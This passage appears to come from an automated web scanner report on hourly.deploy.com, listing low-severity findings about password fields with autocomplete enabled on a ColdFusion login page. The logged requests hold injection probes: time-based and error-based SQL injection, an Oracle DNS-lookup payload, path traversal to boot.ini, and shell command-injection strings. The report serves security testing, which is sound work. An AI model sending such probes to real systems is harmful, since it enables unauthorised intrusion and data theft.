           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.207. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=index.cfm" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.208. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.209. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20SLEEP(25)--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.210. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.211. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.212. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+sleep(25))a--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+sleep(25))a--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.213. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.214. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.215. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.216. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.217. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.218. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1))%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.219. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.220. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1NS_NO HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1NS_NO" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.221. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.222. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fboot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.223. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='+OR+'ns'%3d'ns HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.224. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
